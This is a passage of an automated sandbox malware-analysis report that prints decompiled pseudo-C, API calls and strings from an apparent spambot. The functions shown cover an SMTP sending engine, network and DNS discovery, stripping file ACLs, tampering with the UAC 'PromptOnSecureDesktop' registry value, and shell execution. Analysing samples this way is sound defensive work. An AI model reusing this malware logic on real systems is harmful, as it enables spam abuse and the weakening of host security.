wsprintfA.USER32 ref: 00406671
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040668A
StackWalk64.DBGHELP(0000014C,00000000), ref: 00406696
wsprintfA.USER32 ref: 004066B0
wsprintfA.USER32 ref: 004066E7
wsprintfA.USER32 ref: 004066FF
wsprintfA.USER32 ref: 0040671F
ExitProcess.KERNEL32 ref: 00406755

Strings

va=%08X%08X uef=%p, xrefs: 00406595
12:08:32, xrefs: 00406535
ret=%pp1=%pp2=%pp3=%pp4=%p, xrefs: 0040666B
localcfg, xrefs: 0040672D
ver=%d date=%s %sc=%08x a=%p, xrefs: 00406547
except_info, xrefs: 00406728
%d=%p, xrefs: 004066F9
Jan 13 2018, xrefs: 0040653A
_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p, xrefs: 004065D6
plgs:, xrefs: 004066AA

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
API String ID: 2400214276-165278494
Opcode ID: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
Opcode Fuzzy Hash: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7C1, Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				void* _t63;
				void* _t65;
				void* _t82;
				void* _t96;
				intOrPtr _t102;
				char _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				void* _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									if(E0040EE95( &_v1156,  &_v132) != 0) {
										break;
									}
									L34:
									_push(0);
									_push(0x3f6 - _t103);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							if(_t103 < 5 ||  *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
							} else {
								_t104 = E0040EDAC( &_v1156);
								if(_t104 == 0xdc || _t104 == 0xfa || _t104 == 0x162 || _t104 == 0xdd || _t104 == 0x14e || _t104 == 0xeb) {
									_t129 = 1;
									 *0x413668 = E0040EE95( &_v1156, "ESMTP") & 0xffffff00 | _t74 != 0x00000000;
									_t123 = 1;
								} else {
									_t129 = 0;
								}
								if(_t123 != 0xc || _t104 != 0x217) {
									if(_t129 != 0) {
										goto L23;
									}
									_t76 =  *0x413630;
									if( *0x413630 == 0 ||  *0x413634 == _t129 ||  *0x413638 == _t129) {
										L70:
										_push(0xb);
									} else {
										if(_t123 != 4 || E0040A699( &_v1156, _t76) == 0) {
											if(E0040A699( &_v1156,  *0x413634) == 0) {
												if(E0040A699( &_v1156,  *0x413638) == 0) {
													if(_t123 == 3 || _t123 == 4 || _t123 == 5 || _t123 == 6) {
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														if(E0040EE95( &_v1156, E0040A7A3(_t82, _t82)) != 0) {
															goto L62;
														}
													}
													goto L70;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
										} else {
											_push(8);
										}
									}
								} else {
									_push(0xf);
								}
							}
							goto L72;
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}

0x0040a7cb
0x0040a7cf
0x0040a7cf
0x0040a7d3
0x0040a7d9
0x0040a87d
0x0040a87e
0x0040a886
0x0040a88d
0x0040a893
0x0040a897
0x0040a8c2
0x0040a8f2
0x0040a8f2
0x0040a8f8
0x0040a8fa
0x0040a900
0x0040a906
0x0040a909
0x0040a90a
0x0040a978
0x0040a97c
0x0040a980
0x00000000
0x00000000
0x0040a912
0x0040a91a
0x0040a9b9
0x0040a9c2
0x0040ab4a
0x0040ab4a
0x00000000
0x0040ab4a
0x0040a924
0x0040a92c
0x0040a954
0x0040a968
0x00000000
0x00000000
0x0040a96a
0x0040a96e
0x0040a970
0x0040a971
0x00000000
0x0040a971
0x0040a931
0x00000000
0x00000000
0x0040a940
0x0040a945
0x0040a94c
0x0040a952
0x00000000
0x00000000
0x00000000
0x0040a952
0x0040a982
0x0040a988
0x0040a89e
0x0040a89e
0x00000000
0x0040a89e
0x0040a991
0x0040a9d1
0x0040a993
0x0040a99f
0x0040a9a7
0x0040a9aa
0x0040a9aa
0x0040a9db
0x0040ab41
0x0040ab48
0x0040a9ef
0x0040a9fb
0x0040aa04
0x0040aa40
0x0040aa4d
0x0040aa52
0x0040aa2e
0x0040aa2e
0x0040aa2e
0x0040aa57
0x0040aa6a
0x00000000
0x00000000
0x0040aa70
0x0040aa77
0x0040ab35
0x0040ab35
0x0040aa95
0x0040aa98
0x0040aaca
0x0040aae6
0x0040aaef
0x0040ab12
0x0040ab1a
0x0040ab33
0x00000000
0x00000000
0x0040ab33
0x00000000
0x0040aaef
0x0040aae8
0x00000000
0x0040aae8
0x0040aacc
0x0040aacc
0x0040aaad
0x0040aaad
0x0040aaad
0x0040aa98
0x0040aa61
0x0040aa61
0x0040aa61
0x0040aa57
0x00000000
0x0040a9db
0x0040a8c8
0x0040a8d2
0x0040a8d6
0x00000000
0x00000000
0x0040a8e2
0x00000000
0x0040a8eb
0x0040a89c
0x0040a8af
0x0040a8b8
0x00000000
0x0040a8b8
0x00000000
0x0040a89c
0x0040a7df
0x00000000
0x00000000
0x00000000
0x0040a7ed
0x0040a7f0
0x0040a7f3
0x0040a803
0x0040a7f5
0x0040a7f5
0x0040a7f5
0x00000000
0x00000000
0x0040a845
0x0040a848
0x00000000
0x00000000
0x0040a852
0x0040a855
0x0040a84d
0x0040a84d
0x0040a7fa
0x0040a7fb
0x00000000
0x00000000
0x0040a85c
0x0040a85e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a86a
0x0040a86c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a80a
0x0040a80c
0x0040a871
0x0040a871
0x0040a874
0x0040a875
0x00000000
0x00000000
0x0040a813
0x0040a816
0x0040a816
0x0040a819
0x0040a819
0x0040a81b
0x0040a81c
0x00000000
0x00000000
0x0040a836
0x0040a839
0x0040a839
0x0040a83c
0x0040a83c
0x0040a83e
0x0040a83f
0x0040a820
0x0040a824
0x0040a82f
0x0040a87a
0x0040a87a
0x00000000
0x00000000

APIs

wsprintfA.USER32 ref: 0040A7FB
lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
wsprintfA.USER32 ref: 0040A8AF
send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
wsprintfA.USER32 ref: 0040A8E2
recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
wsprintfA.USER32 ref: 0040A9B9

Strings

ehlo %s, xrefs: 0040A7F5
localcfg, xrefs: 0040AB0B
AUTH LOGIN, xrefs: 0040A80C
quit, xrefs: 0040A86C
ESMTP, xrefs: 0040AA38
Too big smtp respons (%d bytes), xrefs: 0040A9B1
rcpt to:<%s>, xrefs: 0040A855
Too small respons, xrefs: 0040A9C9
Error sending command (sent = %d/%d), xrefs: 0040A8A7, 0040A8DA
., xrefs: 0040A8CA
Incorrect respons, xrefs: 0040AB39
data, xrefs: 0040A85E
mail from:<%s>, xrefs: 0040A848
helo %s, xrefs: 0040A803

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: wsprintf$send$lstrlenrecv
String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
API String ID: 3650048968-2394369944
Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F

Uniqueness

Uniqueness Score: -1.00%

Function 02237A59, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 02237A7F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02237AB6
GetLengthSid.ADVAPI32(?), ref: 02237AC8
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02237AEA
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02237B08
EqualSid.ADVAPI32(?,?), ref: 02237B22
LocalAlloc.KERNEL32(00000040,00000014), ref: 02237B33
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02237B41
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02237B51
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02237B60
LocalFree.KERNEL32(00000000), ref: 02237B67
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02237B83
GetAce.ADVAPI32(?,?,?), ref: 02237BB3
EqualSid.ADVAPI32(?,?), ref: 02237BDA
DeleteAce.ADVAPI32(?,?), ref: 02237BF3
EqualSid.ADVAPI32(?,?), ref: 02237C15
LocalAlloc.KERNEL32(00000040,00000014), ref: 02237C9A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02237CA8
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02237CB9
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02237CC9
LocalFree.KERNEL32(00000000), ref: 02237CD7

Strings

D, xrefs: 02237AAC

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: 8d909adb45cc40eb104205bd5f0d8d8703d17af0acfefaae896e48b4e9b5f90a
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: C5813AB1D1021AABDF22CFE4DD84FEEBBB8AF08344F14806AE505E6150DB759641CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 106
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

0x004019ab
0x004019ae
0x004019b1
0x004019bc
0x004019c5
0x004019c7
0x004019cc
0x004019ea
0x004019f7
0x004019f9
0x004019fe
0x00401ab6
0x00000000
0x00401a14
0x00401a1b
0x00401a1d
0x00401a23
0x00401a28
0x00401abc
0x00401abc
0x00401abe
0x00000000
0x00401abe
0x00401a3c
0x00401a40
0x00000000
0x00000000
0x00401a45
0x00401a46
0x00401a47
0x00401a50
0x00401a60
0x00401a60
0x00401a67
0x00401aa1
0x00401aa4
0x00401aad
0x00000000
0x00000000
0x00401aaf
0x00000000
0x00401a69
0x00401a6c
0x00401a6d
0x00401a73
0x00000000
0x00000000
0x00401a75
0x00401a77
0x00401a82
0x00401a86
0x00000000
0x00000000
0x00401a96
0x00401a9b
0x00000000
0x00401a9b
0x00401a91
0x00401a93
0x00401a93
0x00000000
0x00401a91
0x00401a67
0x004019fe
0x00000000

APIs

inet_addr.WS2_32(123.45.67.89), ref: 004019B1
LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo,?,?,?,?,?,00000001,00401E9E), ref: 004019E2
GetProcAddress.KERNEL32(00000000,GetIfEntry,?,?,?,?,00000001,00401E9E), ref: 004019ED
GetProcAddress.KERNEL32(?,GetBestInterface,?,?,?,?,00000001,00401E9E), ref: 004019F9
GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4

Strings

GetAdaptersInfo, xrefs: 004019DC
123.45.67.89, xrefs: 004019A6
localcfg, xrefs: 004019A3
GetIfEntry, xrefs: 004019E4
~s`ysps, xrefs: 004019B1
GetBestInterface, xrefs: 004019EF
Iphlpapi.dll, xrefs: 004019B7

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg$~s`ysps
API String ID: 835516345-819159683
Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58

Uniqueness

Uniqueness Score: -1.00%

Function 02238578, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 361registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 02238643
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 02238664
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 02238691
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 0223869A

Strings

", xrefs: 02238955
PromptOnSecureDesktop, xrefs: 0223859F, 0223862E, 022386A6, 022386F1, 022387AE, 022387FB, 022388D2, 022388EE

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: "$PromptOnSecureDesktop
API String ID: 237177642-3108538426
Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
Instruction ID: fd17de85b1c3184a5f3e95fef93e6e9477639b02f3ba0a6c4b94a0c859404334
Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
Instruction Fuzzy Hash: CBC192F191024DBEEB22DBE4DD85EEE7B7DEB04304F144065F604EA054EBB14A849F66

Uniqueness

Uniqueness Score: -1.00%

Function 02232CB2, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 194memorynetworkCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 02232CD6
socket.WS2_32(00000002,00000002,00000011), ref: 02232CF0
htons.WS2_32(00000000), ref: 02232D2B
select.WS2_32 ref: 02232D78
recv.WS2_32(?,00000000,00001000,00000000), ref: 02232D9A
GetProcessHeap.KERNEL32(00000000,00000108), ref: 02232E4B

Strings

ps, xrefs: 02232F17

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateProcesshtonsrecvselectsocket
String ID: ps
API String ID: 127016686-3878219058
Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
Instruction ID: 47bebdfdb88d6ebdd051cadfcf68f8fdd07aa9d9db9d895c217a542e5f4fa15d
Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
Instruction Fuzzy Hash: 8361E1B1914315EFC3229FA4DC09BABBBE8FB48754F004A19FD4497154D7B5EC808BA6

Uniqueness

Uniqueness Score: -1.00%

Function 022314D0, Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 022315EA
lstrlenW.KERNEL32(-00000003), ref: 022317C1

Strings

@, xrefs: 022315D0
, xrefs: 022316B2
<, xrefs: 022315C8
D, xrefs: 02231816

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $<$@$D
API String ID: 1628651668-1974347203
Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
Instruction ID: b059125dcf5ba3df93e4dc42e76537acff9df72795699e9498d7d1e3fcb4522d
Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
Instruction Fuzzy Hash: D2F1BEF11183429FD321CFA4C888BABB7E5FB88305F00892DF69A97294D7B4D944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0223764F, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 022376C2
RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02237740
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 02237778
___ascii_stricmp.LIBCMT ref: 0223789D
RegCloseKey.ADVAPI32(?), ref: 02237937
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 02237956
RegCloseKey.ADVAPI32(?), ref: 02237967
RegCloseKey.ADVAPI32(?), ref: 02237995
RegCloseKey.ADVAPI32(?), ref: 02237A3F

Part of subcall function 0223F3F5: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,02237713,?), ref: 0223F3FD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 022379DF
RegCloseKey.ADVAPI32(?), ref: 02237A36

Strings

", xrefs: 022377E9
PromptOnSecureDesktop, xrefs: 022376AE, 022376B3, 022376CE, 0223776B, 022377CF, 0223784B, 02237864, 022379AB

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "$PromptOnSecureDesktop
API String ID: 3433985886-3108538426
Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
Instruction ID: 5d52cf21fe88a0ef1d8f77834d389f66531c751398185c416bd6fe10b685b201
Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
Instruction Fuzzy Hash: 18C172F191020AAFEF229BE4DC44FEEBBB9EF49310F1041A5E544E6194EB75DA84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00402DF2, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97
memorylibrarynetworkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}

0x00402dfb
0x00402e01
0x00402e09
0x00402e11
0x00402e11
0x00402e19
0x00402ef1
0x00000000
0x00402e28
0x00402e34
0x00402e38
0x00000000
0x00000000
0x00402e4f
0x00402e55
0x00402e5a
0x00402e5d
0x00402e60
0x00402e64
0x00000000
0x00000000
0x00402e6d
0x00402e70
0x00402e76
0x00402ede
0x00402ee6
0x00000000
0x00000000
0x00000000
0x00000000
0x00402e78
0x00402e78
0x00402e78
0x00402e7d
0x00000000
0x00000000
0x00402e81
0x00402e84
0x00402e88
0x00402e8f
0x00402e93
0x00402e99
0x00402e9e
0x00402ea6
0x00402eae
0x00000000
0x00000000
0x00402eb5
0x00402eb7
0x00000000
0x00402eba
0x00402eba
0x00402ebc
0x00402eca
0x00402ed0
0x00402ed1
0x00402ed6
0x00000000
0x00000000
0x00402ed6
0x00402ebc
0x00402ed8
0x00402ed8
0x00402eda
0x00000000
0x00402e78

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll,73BCEA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
GetProcAddress.KERNEL32(00000000,GetNetworkParams,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E2E
GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
htons.WS2_32(00000035), ref: 00402E88
inet_addr.WS2_32(?), ref: 00402E93
gethostbyname.WS2_32(?), ref: 00402EA6
GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6

Strings

GetNetworkParams, xrefs: 00402E28
iphlpapi.dll, xrefs: 00402DFB, 00402E00, 00402E10
~s`ysps, xrefs: 00402E93

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

